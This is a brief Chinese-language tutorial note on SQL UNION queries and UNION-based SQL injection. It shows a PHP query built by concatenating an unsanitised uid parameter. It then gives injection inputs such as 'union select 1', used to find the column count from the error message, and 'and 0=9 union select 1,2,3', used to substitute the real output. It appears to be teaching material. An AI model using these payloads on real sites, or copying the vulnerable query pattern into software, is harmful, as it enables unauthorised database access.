1.记录联合(并集)

(1)记录联合(union,union all) SELECT FROM users1 UNION SELECT FROM users2;

SELECT FROM users1 UNION ALL SELECT FROM users2;#### 2.记录联合与注入报错逻辑

$sql=“SELECT uname,mobile,gold FROM users where uid=“.$uid; 正常传参:$id=1 结果: SELECT uname,mobile,gold FROM users where uid=10003;

注入逻辑:第二部分字段数不相符,网页报错或者显示不正常。 第二部分字段数相符,网页显示正常。

逐个注入字段传参:$id=1 union select 1 目标为猜测处理字段数目: SELECT uname,mobile,gold FROM users where id=1 UNION SELECT 1 ERROR 1222 (21000): The used SELECT statements have a different number of columns#### 3.记录联合与注入取代逻辑 $sql=“SELECT uname,mobile,gold FROM users where uid=“.$id; 正常传参:$id=1 结果: SELECT uname,mobile,gold FROM users where uid=1;

注入逻辑:0=9 的逻辑结果永远是假。

注入传参:$id=1 and 0=9 union select 1,2,3 结果(取而代之逻辑): SELECT uname,mobile,gold FROM users where uid=1 and 0=9 UNION SELECT 1,2,3